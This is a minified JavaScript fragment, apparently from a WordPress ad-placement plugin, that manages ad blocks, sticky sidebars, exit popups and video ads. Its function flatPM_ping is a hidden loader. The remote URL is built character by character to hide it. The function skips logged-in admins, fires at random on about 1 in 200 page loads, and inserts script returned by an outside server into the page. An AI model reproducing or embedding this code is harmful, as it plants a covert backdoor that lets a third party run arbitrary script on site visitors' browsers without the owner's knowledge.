    ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
    '+c+"
    ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
    ');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
    ');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
    '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
    "],tbody:[1,"","
    "],colgroup:[2,"","
    "],col:[3,"","
    "],tr:[2,"","
    "],td:[3,"","
    "],th:[3,"","
    "],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
    '+a+" через "+o+'
    '+r+'
    ',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
    ');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}